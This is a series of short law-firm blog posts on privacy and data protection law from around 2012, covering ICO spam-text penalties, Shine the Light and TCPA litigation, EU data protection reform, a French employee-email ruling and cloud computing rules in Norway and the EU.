• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Since March of this year, the Information Commissioner’s Office (ICO) has been asking members of the public to report any calls or texts they have received from unknown senders by using an online survey. The survey information has allowed the ICO to focus its investigations on organisations responsible for making unsolicited communications. The ICO received nearly 30,000 responses and has been working to link these numbers to companies with a view to enforcement action.

The ICO announced its intention to issue two monetary penalties in excess of £250,000 to illegal marketers for the first time under the Privacy and Electronic Communications Regulations ('PECR'), which regulates electronic marketing. Each of the marketers have distributed millions of spam texts to individuals without obtaining their permission. The two marketers have 28 days to respond to a letter sent by the ICO providing proof that they were complying with the law; otherwise, final penalty notices will be issued.

The ICO has indicated that they will continue to monitor compliance with the Regulations. Simon Entwisle, Director of Operations at the ICO, stated that they “are already working to identify other individuals and companies involved in these unlawful practices.” He went on to say that this is “an important step that shows those who blatantly break the law will be in line for a sizeable six-figure penalty from the ICO.”

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Steven Boranian and Joshua Marker.

Earlier this year we wrote to you about an increase in litigation claiming violations of California’s Shine the Light law. Since that time, multiple courts have had the opportunity to interpret the law. This has brought some much-needed clarity to the exact contours of the law, and provided direction on what is required for companies to remain in compliance.

As you will recall, the Shine the Light law, California Civil Code 1798.83, is intended to provide transparency to meet consumers’ demand to know how the businesses they patronize use, share, and disclose personal information. Multiple class actions were filed alleging that certain businesses did not provide consumers with the information necessary to obtain an accounting of how their personal information was used and disclosed.

In order to maintain a lawsuit, however, these initial court decisions have made it clear that a plaintiff must allege more than failure to provide contact information to obtain an accounting of the use and disclosure of personal information. A plaintiff must also properly allege an injury in order to have standing. So far, plaintiffs have taken two different approaches to alleging an injury, one of which suggests that this is not the end of Shine the Light litigation.

First, plaintiffs have advanced numerous theories of economic injury, with no success to date. In Boorstein v. Men’s Journal LLC, 2012 WL 2152815, the court rejected the theory that failure to provide a method for obtaining an accounting diminished the value of plaintiff’s personal information. In Miller v. Hearst Communications, Inc., 12-CV-0733 (C.D. Cal.), the court has rejected this same “diminished-value-of information theory,” and then on an amended complaint, rejected the theory that compliance with the Shine the Light law was part of the benefit of the bargain, and that failure to comply deprived plaintiff of the full value of its subscription.

Second, these plaintiffs have argued that they have standing because of “informational injury.” That is, the plaintiffs were injured because they failed to obtain information that must be publicly disclosed pursuant to a statute. While neither case above found an informational injury in those instances, they did note that information injury may be viable in certain narrow circumstances. In order to have standing, a plaintiff must either show that it in fact requested this information and did not receive it, or provide evidence that it would have requested the information if the company disclosed a method for doing so. In a third case, Baxter v. Rodale, Inc., 12-CV-00585 (C.D. Cal.), the court in fact found that plaintiff did have standing under the informational injury theory because plaintiff had visited the company’s website on numerous occasions and the required disclosures were not there. That case, however, was nonetheless dismissed, as the court found that the company did provide contact information for consumers to opt out of information-sharing and thus was in compliance with the law.

In summary, while plaintiffs have not yet found success in Shine the Light litigation, the courts have found that in limited situations, informational injury may provide a basis for a plaintiff to have standing to maintain a lawsuit. Given that the courts have left the door slightly open in part, we likely have not heard the last of Shine the Light litigation. Further, it should be noted that the same plaintiffs’ lawyers have begun filing similar class actions under other states’ laws. It is critical that you stay up-to-date and ensure compliance with the law.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

France’s highest court (“Cour de cassation”) ruled 26 June 2012 in Monsieur X v. YBC Helpevia that a company’s internal rules may limit an employer’s access to employee emails.

French case-law has traditionally held that employees have a right to privacy at their workplace and that an employer cannot search an employee’s personal files stored on a work computer without breaching the employee’s right to privacy (Nikon France v. Onof).

As a result, case-law allows a French employer to search an employee’s professional messages, but prohibits any access to his/her personal files and messages that are specifically identified and marked “personal”.

The current decision has, however, narrowed the employer’s ability to search an employee’s professional files if the internal rules of the company place restrictions on the search.

In the current case, an employee was suspected of hacking into the email account of his employer in order to access data about potential future salary increase proposals. To confirm the suspicion, the employee’s emails were opened by the company on his professional computer whilst he was absent. However, the company’s internal rules stated that the employer would refrain generally from accessing the employee’s computer in such circumstances. The “Cour de cassation” confirmed the Rouen Court of Appeal decision and ordered the company to compensate the employee for unjust dismissal.

This decision established that if there is a general prohibition of the employer reading employees’ emails in their absence in the internal rules of a company, no distinction between personal and professional communications will be made – none of the communications may be read.

As a consequence, by failing to make the distinction between personal and professional messages in its internal rules, the company restricted its ability to access the employee’s professional emails by stating that such access could only be in the physical presence of the employee.

French companies looking to monitor their employees’ communications should therefore make sure that they do not unintentionally restrict themselves more than the law requires. This is also a reminder for employers that they need to draft their internal policies very carefully.

Employee protection remains a very sensitive issue in France. On another topic, the French CNIL published 23 October 2012 its decision to withdraw previous authorization it had granted to employers to monitor employee access to their workplace, as well as their work schedule by biometrical means.

The CNIL therefore decided to suspend for five years the application of its 2006 AU-007 “Unique Authorization” because of the fact that French labour organizations prefer non-biometric managing tools in order to strengthen the workers’ rights and to preserve the trust relationship between employer and employees.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Neelie Kroes, Vice President of the European Commission, has signalled her concern over the progress of the adoption of the Do-Not-Track (DNT) standard, which is being developed by the World Wide Web Consortium (W3C) as a universal mechanism to communicate relevant consent or lack of consent to the tracking of individuals’ web data. The mechanism is already present in certain browsers, including Microsoft and Mozilla; however, the lack of a commonly agreed-upon standard is causing dispute, with increasingly broad exceptions being suggested to the W3C, which Jon Leibowitz, the Federal Trade Commission's Chairman, labelled 'a loophole you could drive a virtual truck through'.

Delay and frustration of the process have mostly been attributed to advertisers and marketers, many of whom are insisting that marketing is one of the most important freedoms of a civilised society, and that the DNT will harm their business operations. Indeed the Direct Marketing Association (DMA) has asked the W3C that marketing be added to the list of those activities exempt from the standard, which has drawn much condemnation from the Commissioner.

This ‘watering down’ of the standard is the main problem according to Kroes, who would prefer that DNT build on the principle of informed consent, giving consumers control over their information and letting them choose not to be tracked. Kroes addresses the current issues over default settings, stating that DNT should be specific in informing consumers about which default settings are in their software and devices. Anonymisation and retention limits should be incorporated to mitigate, but cannot be seen as a ‘get-out clause’.

Kroes criticised the current DNT standard, declaring that it will not, on its own, guarantee satisfying cookie requirements under the ePrivacy Directive, but did emphasis the value of DNT in harmonising online business and transparency to consumers.

Kroes warned that time is running out to create a simple, uniform and self-regulatory standard to address tracking. She views harmonised DNT standards as having universal appeal. "When I say this is in everyone's interest, I mean everyone. Including American companies. Because if you want to track Europeans, you have to play by our rules."
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Singapore has passed the Personal Data Protection Bill after its second reading in Parliament on 15 October. The Bill applies to all organisations across the private sector.

In his speeches to Parliament, Yaacob Ibrahim, the Minister for Information, Communications and the Arts (MICA), said that in an era of exponential data growth, there was a need for a move away from the original sectoral approach to a general data protection framework, to ensure a baseline standard of protection for personal data across the country that will operate concurrently with other legislative and regulatory frameworks.

To allow businesses time to adjust their data management policies and procedures, Singapore will adopt a phased approach to implementing the personal data protection law. The transition-period schedule stipulates that DNC registry provisions will come into force in 12 months, and the data protection rules will come into force in 18 months.

Of particular note, and different from the European definition of ‘personal data’, the scope of the new law covers not just living individuals, but also deceased persons for a period of 20 years following their deaths. International transfers are less prescriptive than that of Europe and will be allowed after an organisation has ensured that appropriate measures are in place to protect data.

A Personal Data Protection Commission (PDPC) will be set up to function as the country's main authority to administer and enforce the data protection rules. If an organisation is non-compliant, the PDPC may impose a maximum financial penalty of S$1 million (USD $819,000). A National Do-Not-Call (DNC) Registry will be created by early 2014.

The minister extolled the virtues of the Personal Data Protection Bill, stating that it will strengthen Singapore’s overall competitiveness, and will enhance its status as a global data hub by providing a conducive environment for global data management industries, such as cloud computing and business analytics, to operate in Singapore.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar and J. Andrew Moss.

If your team is in the process of negotiating and purchasing security and data privacy event liability insurance (“cyberliability” coverage), think carefully before signing any technical due diligence representations or warranties that are typically requested in connection with the insurance application. Oftentimes, this detailed privacy compliance document is presented to an IT or Security Group with very little input from the company’s legal team. This is an area where the lawyers need to be acting in concert with IT and/or Security, not only because the information communicated to the insurer’s underwriter likely will not be privileged (and thus could be disclosed in litigation), but also because errors or misstatements in the application, even if innocent, may give rise to an insurance coverage dispute in the event of a claim. Reviewing the completed insurance application with the assistance of counsel before submission to the underwriter may help to avoid problems down the road. For example, one of our clients discovered in the process of applying for cyberliability coverage that it was representing having in place full, up-to-date system-patching across the enterprise. In most organizations, however, full system-patching is not feasible or even advisable, given customized software suites, new version software bugs, or other software/hardware specific compatibility issues. By having its legal and technical teams work in concert, our client was able to correct this representation prior to disclosure and provide the underwriter with its system-patch management policy showing flexibility to conduct patch analysis, which in the event of a breach or claim could have unnecessarily compromised the company’s ability to recover under its insurance policy.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Data Protection Supervisor (EDPS) has published its opinion on the European Commission draft Regulation on electronic identification and trust services for electronic transactions in the internal market. The proposed Regulation is expected to enhance trust in pan-European electronic transactions, to ensure cross-border mutual recognition of electronic identification by enhancing current rules on e signatures, and by providing a legal framework for electronic seals, time stamping, electronic document acceptability, electronic delivery and website authentication.

Electronic Identification schemes and trust services raise significant data-protection issues stemming from the processing of personal data, and the EDPS supports the proposed Regulation as a method of harmonising data-protection principles, and contributing toward mutual recognition and acceptance of electronic trust services and identification schemes. The EDPS, however, has suggested several recommendations to increase harmonisation and interoperability, such as a common set of security requirements, and clarification of individuals’ rights of access and to be informed.

The proposed Regulation leaves wide discretionary powers with the member states to create electronic identification schemes, and the EDPS recommends adopting a common set of conditions to be applied for the use of national identification schemes across borders.

In relation to the requirements for a mutual recognition scheme for electronic identification schemes, the EDPS recommends that the Proposed Regulation specify: (i) which data or categories of data will be processed for cross-border identification of individuals and set data minimisation goals; (ii) a common minimum safeguard level proportionate to the risks involved and at least compliant with the requirements set forth for the providers of qualified trust service; and (iii) a set framework for the interoperability of national identification schemes.

In relation to the requirements for the provision and mutual recognition of electronic trust services, the EDPS recommends that the Proposed Regulation specify: (i) if personal data will be processed and, if so, the data or categories of data to be processed so as to assess data protection implications; (ii) appropriate safeguards to avoid any overlap between the competencies of the supervisory bodies; (iii) that notification requirements for data breaches be consistent with those in the e-Privacy Directive; and (iv) the setting of specific time limits for data retention.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle and Paul Bond.

A draft executive order on Improving Critical Infrastructure Cybersecurity Practices may now gain speed with the re-election of President Obama. The Cybersecurity Act of 2012 was introduced by Senators Lieberman and Collins (Homeland Security and Government Affairs Committee), Rockefeller (Commerce) and Feinstein (Intelligence) but failed to gain enough support in the private sector and with other members to become law. The essential elements of the legislation were to foster the exchange of threat or event information between the government and the private sector, provide limited protection from liability to encourage such voluntary exchange by the private sector, and encourage collaboration on the creation of voluntary cybersecurity standards. With the election results, a resurrection of cybersecurity legislation is probable. While all members recognize the existence and significance of the cyber threat, they will continue to differ on the approach with Republicans expressing concern that the recent legislation introduced more regulatory burdens. In anticipation of a protracted legislative process, and to address the immediate cybersecurity concern, release of an executive order in the near term is likely. A paper draft that was recently circulated among the Deputies Committee contains elements that are consistent with the proposed legislation and draft executive order with some new twists.

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Parliament has published a study aimed at providing advice on priority measures to ensure that the Proposed Data Protection Regulation, presented by the European Commission (EC) earlier this year, is more comprehensive in relation to data protection and more protective of consumers’ privacy rights.

The European Parliament supports various new rights, namely the right to be forgotten, the right of portability, and the right against profiling, and commends the EC’s proposal to create a level playing field across the EU through inclusion of a ‘one-stop-shop’ principle. This principle involves a single data-protection authority based on an organisation’s main location, the applicability of data protection laws extraterritorially for businesses active in, but based outside, the EU, and the general principle of accountability.

The European Parliament believes, however, that globalisation and the advent of new technologies still needs to be fully addressed. The proliferation of geo-location services, smart metering, face recognition technologies, social networking services, online gaming, and RFID technologies, has meant that companies and governments are often processing personal data without data subjects being aware of the impact of these activities.

While the European Parliament supports the refined definition of consent, the study recommends that a variety of online identifiers, such as IP addresses or cookies, should be specifically qualified, and situations illustrated where they should be treated as personal data. The study also recommended that the proposed Regulation should encourage anonymisation, especially for the processing of sensitive data. Further, the European Parliament would like to see the scope of what constitutes a data controller limited to organisations that determine the “purposes” of data processing, rather than the “conditions”, as well.

The European Parliament sees international data transfers as a key area requiring improvement, especially in the context of cloud computing. The study calls for a greater emphasis on risk assessment prior to transferring data with more emphasis on accountability, and suggests the development of an accreditation system or the dedicated Cloud Safe Harbour Programme, as well as self-regulatory industry standards.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Parliament's Committee on Civil Liberties, Justice and Home Affairs has outlined its concerns over the lack of clarity within the data protection principles contained in the proposed General Data Protection Regulation, and has made various proposals which they believe will strengthen the level of data protection.

The Committee stresses the need to include a definition of ‘anonymity’ to illustrate to data controllers when they are outside the scope of the Regulation, and that the definition of ‘consent’ needs to be clearer and include clarification that technical standards that express an individual’s wishes, such as a ‘Do Not Track’ standard, are a valid form of providing explicit consent.

To improve transparency, the Committee also suggests that information about how data is processed be provided to individuals in an easily comprehensible form, such as by ‘layered privacy policies’ and standardised logos or icons. The Committee also supports the extraterritorial application of the proposed Regulation, but believes that the criteria for determining ‘adequacy’ may need to be strengthened.

Whilst endorsing the right to be forgotten, the right to object, and the mandatory introduction of Data Protection Officers (DPO) within the EU, the Committee nonetheless suggests that more specific guidance in relation to DPO independence, powers and duties is necessary, and that further strengthening accountability can be achieved through aligning data breach notification with standards contained in the e-Privacy Directive.

The Committee encourages a clearer division of duties and responsibilities between data controllers and data processors to avoid legal uncertainty for companies, authorities and consumers, as well as stronger incentives for companies to implement privacy-by-design principles.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In its second opinion on the proposed Data Protection Regulation, the Article 29 Working Party suggests that a natural person can be considered identifiable when, within a group of persons, he or she can be distinguished from other members of the group and consequently be treated differently. They have therefore recommended that information that can lead to individuals being singled out and treated differently should be considered “personal data.” The Working Party proposes broadening the definition of “data subject” in the proposed Regulation to include not only identified or identifiable natural persons, but also those who could be singled out and treated differently.

The Working Party also suggested that organisations should have to treat “cookie identifiers” and “IP addresses” as personal data. This would be accomplished by altering recital 24 which, although not legally binding, provides additional detail on what is to be meant by the definition of personal data.

The Working Party has also defended the "new and positive elements" drafted into the proposed Regulation on rules around consent. Responding to criticism that it might be impractical to always obtain explicit consent, the Working Party supports broad requirements to explicit consent as "necessary to truly enable data subjects to exercise their rights".

The Working Party raised a concern relating to the delegated acts of the European Commission without seeking approval from the Working Party's successor body, the European Data Protection Board. This concern is shared by the wider data protection community, as the EDPB will be much closer to issues at a national level and be in a position to recommend outcomes.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris and Amy S. Mushahwar.

PLEASE NOTE that the amendments to the Federal Communications Commission’s (FCC) regulations implementing the Telephone Consumer Protection Act (TCPA) published by the FCC June 11, 2012, and relating, most significantly, to the necessity of obtaining written consent before placing some autodialed calls or sending some prerecorded messages, have now been approved by the Office of Management and Budget (OMB) and published in the Federal Register. Accordingly, the effective dates of those amendments appear below:

• Amendment to abandoned call requirements (47 CFR 64.1200(a)(7) will be effective November 15, 2012.
• New rule requiring that automated opt-out mechanism be included in all prerecorded telemarketing messages (47 CFR 64.1200 (b)(3) will be effective January 14, 2013. 
• The requirements to obtain express written consent before making autodialed or prerecorded telemarketing calls to wireless numbers, and before sending prerecorded telemarketing messages to residential lines (47 CFR 64.1200(a)(2) and (3)), will be effective October 16, 2013.

A copy of the Federal Register Notice is provided here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris and Amy S. Mushahwar.

Appellant, joined by a number of amicae including the American Bankers Association, is seeking rehearing or rehearing en banc in connection with a recent decision by the Ninth Circuit that should be of grave concern to any entity that uses auto-dialers in its contacts with consumers. That decision, in the case of Meyer v. Portfolio Recovery Associates, LLC (PRA), upheld a district court’s grant of a preliminary injunction and provisional class certification, in a suit alleging violations of the Telephone Consumer Protection Act (TCPA), 47 § U.S.C. 227.¹

Please click here to read the issued Client Alert.

¹Meyer v. Portfolio Recovery Associates, LLC, 2012 WL 4840814 (C.A.9 (Cal.)).

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris and Amy S. Mushahwar.

Over the course of the past couple weeks, the Federal Communications Commission released a flurry of Public Notices, putting out for comment seven pending Requests for Declaratory Rulings, most relating to the use of auto-dialing technologies, and all relating to application of the Telephone Consumer Protection Act of 1991 (TCPA). Moreover, a number of other, similar requests have been put out for public comment by the FCC in recent months. The majority of these requests seek interpretation or clarification of how the TCPA’s definition of an “autodialer” is to be applied in a wide variety of circumstances that have resulted from technological developments in the decade since the TCPA was enacted.

Please click here to read the issued Client Alert.

 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Patricia Cave.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar and Christine E. Nielsen.

In February, California Attorney General Kamala D. Harris warned mobile app developers that their disclosure of data-collection practices to consumers would face scrutiny from her office in the coming months, and that entities not in compliance with California’s requirement to maintain and post a privacy policy would be investigated. We discussed that warning, and noted that mobile app developers would have some time to play “catch up” to draft, approve, and post privacy policies. As of October 30, time’s up.

On Tuesday, Attorney General Harris announced that she sent letters to approximately 100 mobile app developers and companies that her office determined were non-compliant with California privacy law. Those companies have 30 days to come into compliance; that is, to conspicuously post a clear and appropriately formatted mobile privacy policy within their mobile app. Entities that do not comply within 30 days potentially face a civil penalty of $2,500 for each download of the non-compliant app, which could add up quickly if your app receives considerable consumer traffic.

The California Online Privacy Protection Act requires an operator of a website and other online services who collects personally identifiable information from California residents to conspicuously post or make available its privacy policy. That privacy policy must include the categories of personally identifiable information the operator collects, as well as the policy’s effective date and the operator’s method for notifying consumers of changes to the policy. In addition, if the operator has a process whereby consumers can review and request changes to their collected information, the policy must describe that process.

We have previously discussed the state attorneys general focus on mobile application privacy for the 2012, and more recently interviewed Travis LeBlanc on mobile application privacy for the 2012, and more recently interviewed Travis LeBlanc,  who noted that the new Privacy Protection and Enforcement Unit would pay close attention to privacy in the mobile environment.

Mobile app developers who were not in this first round of enforcement notices, but who have not yet posted a privacy policy that describes the categories of personally identifiable information their apps collect, should take this opportunity to get something in place immediately. Attorney General Harris calls these letters the “first step” in the Privacy Protection and Enforcement Unit’s efforts to enforce the Online Privacy Protection Act, and will likely move on to another round of apps. The time for playing catch up is over.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

Reed Smith Paris partner Daniel Kadar and counsel Séverine Martel hosted on 25 October 2012, a new edition of the conference cycle organized by Reed Smith Paris with the European American Chamber of Commerce, dedicated to the mitigation of Compliance obligations, particularly as set forth in Codes of Conduct, with data protection requirements.

After a general presentation of the data protection requirements in France, particularly with respect to notification duties with the French Data Protection Authority, the “Commission Nationale de l’Informatique et des Libertés” (CNIL), the panel, which included compliance directors of French health care giant SANOFI and General Electric Health, brought examples of how to mitigate compliance obligations, in particular as set forth in Codes of Conduct most International organisations have now adopted, with applicable data protection regulation.

The first example was dedicated to the New French Health Care Regulation and its transparency and disclosure requirements as to the existence (and the financial range) of agreements between the health care and cosmetics industry with health care professionals (including Medicine students), showing that the disclosure of financial and private information (such as the home address for the medicine students) had to be managed carefully with respect to the data owner’s information and access rights.

The second set of examples was dedicated to the implementation of whistle blowing hotlines in France, which need to have a restricted scope under French law: the grounds for this limited scope is that the French regulator has worked on the basis of the sole Sarbanes-Oxley (“SOX”) Act obligations limited to accounting and audit, and therefore mainly excluded the other fields of application the Code of Conduct generally also contain.

After having highlighted the major characteristics of the requirements under French law, taking into account specific labor law obligations, the panel concentrated on the ways and means of implementing such hotlines in France:

• Integrating them globally, or based on geographic regions
• Operating through third-party service providers or through in-house “mediators”
• Insisting on the necessity that such hotlines constitute only an alternative to more formal ways of notifications to the hierarchy, and excluding anonymous reports

The panel concluded by stating that there is no “one size fits all” Compliance recipe, and that Compliance remains a place of state-of-the-art mitigation of contradictious regulation.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris and Amy S. Mushahwar.

In last week’s all-day Robocall Summit at the Federal Trade Commission (“FTC”), representatives of the FTC and the Federal Communications Commission (“FCC”), and the Indiana Attorney General, repeatedly referenced their frustration in the face of a constantly multiplying number of consumer complaints regarding unwanted robocalls and their inability, as regulators, to stay ahead of the “bad guys” in an increasingly digital world. The FCC’s Chief Technology Officer lamented that “automation has been all on the side of the bad guys. …Law enforcement operates in the analog world.”

Please click here to read the issued Client Alert.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark S. Melodia and Frederick Lah.

Last year, we blogged about an Ontario Court of Appeals case holding that a teacher had a reasonable expectation of privacy in his work computer.

In that case, a high school teacher, Richard Cole, was charged with possession of child pornography and the unauthorized use of a computer. Cole was issued a laptop by the school for his personal use. In addition to keeping some personal files on the laptop, Cole downloaded nude photos of a high school student. When a technician found the photos while performing his duties, he copied the photos onto a disc and showed them to the school principal. The principal seized the laptop and handed both the laptop and disc over to the police. The police then took a mirror image of the laptop's hard drive without a warrant. The Court of Appeals for Ontario held that Cole had a reasonable expectation of privacy in the laptop, and that the mirror image of the hard drive was wrongfully obtained. The court held that the disc containing the photos was legally obtained because the technician had a right to access Cole’s laptop.

This past Monday, the Supreme Court of Canada reinforced the appellate court’s position that Cole had a privacy right over the personal use of his workplace laptop, and that he should not have been subjected to a warrantless search. The issue as to whether the disc was wrongfully obtained was not in dispute. The court reasoned:

“The accused’s personal use of his work-issued laptop generated information that is meaningful, intimate, and organically connected to his biographical core. Pulling in the other direction are the ownership of the laptop by the school board, the workplace policies and practices, and the technology in place at the school. These considerations diminished the accused’s privacy interest in his laptop [ ] but they did not eliminate it entirely. On balance, the totality of the circumstances support the objective reasonableness of the accused’s subjective expectation of privacy. While the principal had [ ] a reasonable power to seize and search a school-board issued laptop, the lawful authority of the accused’s employer to seize and search the laptop did not furnish the police with the same power.”

It is important to note, though, that while the court held that a privacy right existed in Cole’s work-issued laptop, the court still found the copy of the hard drive to be admissible under its application of Canadian evidence law: “The exclusion of the material would have a marked negative impact on the truth-seeking function of the criminal trial process. The admission of the evidence would not bring the administration of justice into disrepute and therefore the evidence should not be excluded.”

As we noted in our last post and as is clear from the court’s language, determinations as to whether a reasonable expectation of privacy exists will continue to be fact-specific. The court’s holding here clearly does not provide employees with an unqualified expectation of privacy in their work computers. Who actually owns the computer, and workplace policies and procedures should be taken into consideration. Whether or not such an expectation exists will continue to depend on the totality of the circumstances.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 25 January 2012 the EC proposed a uniform legal framework for providing legal certainty on data protection. The most notable proposed change is that from a European Directive to a Regulation (the Proposed Regulation) to ensure directly enforceable implementation across all Member States. The Proposed Regulation sets out general rules on data protection that would modernise and further harmonise the data protection regime created by the Data Protection Directive (95/46/EC).

While the European Data Protection Supervisor (EDPS) has stated that it is a huge step forward for data protection in Europe, it still fails to offer a comprehensive set of data protection rules for the EU.

Privacy International’s analysis concurs with this sentiment.

It suggests that the Proposed Regulation goes some way to ensure that data protection law responds to contemporary and emerging threats to the right to privacy, and commends the introduction of additional controls for individual consumers with regards to access, correction and deletion and the provision of greater power for independent authorities to ensure effective enforcement. It also welcomes the emphasis on responsibility and accountability through privacy by design and the introduction of data breach notification for all industry sectors.

Privacy International, however, also express concern over various weaknesses that may undermine individuals’ rights. It is advocating for more specific, comprehensive protection including:

• A stronger definition of consent to make it ‘provable’.
• A clearer definition of processing on the grounds of ‘legitimate interests’.
• Data Breach notification limited to serious risk to avoid notification fatigue.
• Inclusion of information about profiling and security measures to individuals.
• Deletion of the provision allowing further non-compatible use on the basis that it undermines the very basis of data protection.

While most of us welcome the idea of great harmonization of data protection law across the EU, Privacy International’s views are at odds with the other fundamental purpose of data protection law, which is the free flow of data and while individuals’ rights should be protected, the EU has the unenviable task of ensuring that it is done in a way that does not thwart business and have a dampening effort on the EU’s goals for the future of its digital economy.

• Print
• Comments (1)
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 25 January 2012 the European Commission proposed a uniform legal framework for providing legal certainty on data protection. This includes a Regulation (the Proposed Regulation) with general rules on data protection that would modernise and further harmonise the data protection regime created by the Data Protection Directive (95/46/EC) and a Directive (the Proposed Directive) with specific data protection rules for the law enforcement sector.

The Proposed Directive has been met with critical reviews, with the European Data Protection Supervisor (EDPS) taking the view that the Proposed Directive does not meet the requirement of a consistent and high level of data protection and the Article 29 Data Protection Working Party (WP29) stating that it was “disappointed by the Commission’s level of ambition and [the WP29] underlines the need for stronger provisions.” This lack of high level data protection is troubling because in the context of law enforcement citizens may be put at particular risk due to the likely processing of sensitive personal data.

In its analysis of the Proposed Directive, Privacy International is principally concerned that (i) the rights of data subjects are significantly weaker than they would be under the Proposed Regulation; (ii) data controllers are subject to fewer and vaguer obligations than they would be under the Proposed Regulation; (iii) there is no mention of preventing transfers of data to non-competent authority recipients; and (iv) supervisory authorities have disproportionately limited powers in comparison to their peers under the Proposed Regulation.

In many instances there does not appear to be any justification for departing from the rules provided in the proposed Regulation. Privacy International has therefore called for improvements to the articles of the Proposed Directive to rectify their concerns and to ensure that it is more comprehensive and in tune with the Proposed Regulation in the Commission’s proposal.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

We previously told you about the Norwegian Data Protection Authority’s, Datatilsynet (Norwegian DPA) finding that Google Analytics breached that country’s data protection laws. In an about face, Norwegian DPA has now decided to hold off its ban on the use of Google’s and Microsoft’s cloud computing services by the Municipalities of Narvik and Moss, respectively. The Norwegian DPA had originally concluded that Google Apps and Microsoft 365 failed to comply with the Norwegian Data Protection Act because the municipalities lost control over the storage and access restrictions to personal data being processed by Google and Microsoft through their Cloud Computing services. The main concern the Norwegian DPA had was the failure to establish a valid data processor agreement in accordance with Section 15 of the Personal Data Act, which did not fulfill information security requirements according to Section 13 and did not adhere to regulations on the transfer of personal data abroad in section 29. The Norwegian DPA was also concerned that the U.S. Patriot Act represented a challenge with regard to the safeguarding of personal privacy, even within the Safe Harbor scheme.

The Norwegian DPA is now satisfied that Google and Microsoft have increased their cloud computing security and that the data stored in the EU/EEA and in the United States under the safe harbor regime are protected by adequate safeguards. This fundamental reversal of regulatory policy suggests that the DPA is reassessing the significance of cloud computing in light of its growing popularity. However, the use of cloud computing services in Norway will be made conditional upon strict prerequisites:

• A thorough risk and vulnerability analysis must be carried out in advance.
• The enterprise must have established a satisfactory data processor agreement in compliance with Norwegian regulations. The municipality will be responsible for ensuring compliance with statutory requirements.
• The use of cloud computing services must be audited on a regular basis. An independent third party must carry out a security audit on behalf of the municipality to ensure compliance with the data processor agreement.
• The data processor agreement must be enforced, and the supplier's general privacy policy must be in compliance with the agreement.
• In relation to the transfer of personal data; unless the countries transferred to have been approved as a safe destination by the EU Commission, the transfer must be regulated by standard agreements.
   

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

With concerns over the potential fragmentation of the digital single market and the proliferation of different data protection standards for personal data across the EU, the European Commission (Commission) has published new guidance on the use of cloud computing. The Commission has identified the steps it wishes to introduce in 2013 to ensure publicly available cloud offerings adhere to European standards, not only in regulatory terms, but also in terms of being competitive, open and secure. The Commission suggests that cloud computing, being born global, requires a reinforced international dialogue on safe and seamless cross-border use in order to create a digital single market.

The Commission believes that cloud computing has the potential to slash users' IT expenditure, boost productivity and growth, and create 3.8 million new jobs by 2020. Even the smallest firms will be able to use the cloud to reach out to ever-larger markets, while governments can make their services more attractive and efficient. The lack of standardisation and harmonisation across the EU is a concern for cloud computing adoption, and implementing policies to achieve this is therefore the crux of the Commission’s strategy. A preparatory study undertaken for the Commission estimates that a public cloud would generate €250 billion in GDP in 2020, with cloud-friendly single market policies in place against €88 billion in a ‘no intervention’ scenario.

To deliver on its goals, the Commission states that it will launch three cloud-specific actions: (1) cutting through the jungle of standards; (2) implementing safe and fair contract terms and conditions; and (3) establishing a European Cloud Partnership (ECP) to drive innovation and growth.

On 25 January 2012, the Commission proposed a uniform legal framework for providing legal certainty on data protection which would address the issues raised by the cloud, and apply directly and uniformly across all 27 Member States. The new legal framework will provide for the necessary conditions for the adoption of codes of conduct and standards for the cloud, where stakeholders see a need for certification schemes that verify that the provider has implemented the appropriate IT security standards and safeguards for data transfers, including the adoption of cloud-friendly binding corporate rules where necessary.

The European Telecommunications Standards Institute (ETSI) has set up a Cloud Group to consider cloud standardisation needs and conformity with interoperability standards. The Commission will work with the support of ETSI, the European Network and Information Security Agency (ENISA), and other relevant bodies to assist the development of EU-wide voluntary certification schemes in the area of cloud computing.

The Commission states that standardisation in licensing and security is essential to the development of a digital single market. Standardisation in licensing would allow customers to access their personal account from multiple devices, irrespective of the territory. The territory from which the account is accessed should be introduced. Moreover, a rapid adoption of the Commission’s proposal for a Directive on Collective Rights Management will address many of the cross-border licensing needs for cloud content. In terms of security standards, the Commission suggests secure eAuthentication methods and the adoption of common standards for Internet transactions, which could be achieved through the adoption of their proposals on e-identification and authentication.

The Commission also proposed the adoption of model contract terms to address issues such as data retention, data disclosure, and integrity and liability.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

We have previously reported on the different requests and repeated questionnaires the Commission nationale de l'informatique et des libertés (CNIL) has sent to Google over the past few months regarding the evaluation of Google’s compliance with applicable European Data Protection Regulation concerning its new integrated privacy policy, as well as the new integrated platform launched March 1, 2012, despite the CNIL’s demand to postpone such launch.

